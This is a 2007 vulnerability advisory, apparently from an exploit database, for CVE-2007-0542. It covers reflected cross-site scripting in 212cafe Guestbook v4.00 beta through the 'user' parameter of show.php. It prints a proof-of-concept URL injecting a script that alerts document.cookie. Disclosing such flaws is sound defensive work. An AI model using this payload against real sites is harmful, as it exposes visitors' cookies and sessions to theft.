Bug: XSS in Guestbook ( v.4.00 beta ) ( Ascii Version )

Search:
WLB2

XSS in Guestbook ( v.4.00 beta )

Published
Credit
Risk
2007.01.30
Linux_Drox
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2007-0542
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Hello

Vulnerable : Guestbook ( By 212cafe.com )
Version: v.4.00 beta
Web : http://www.212cafe.com

Exploit :
http://www.example.com/guestbookv4.0/show.php?user=[XSS]

Example :
http://www.example.com/guestbookv4.0/show.php?user='><script>alert(docum
ent.cookie);</script>

-----

Discoverey By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version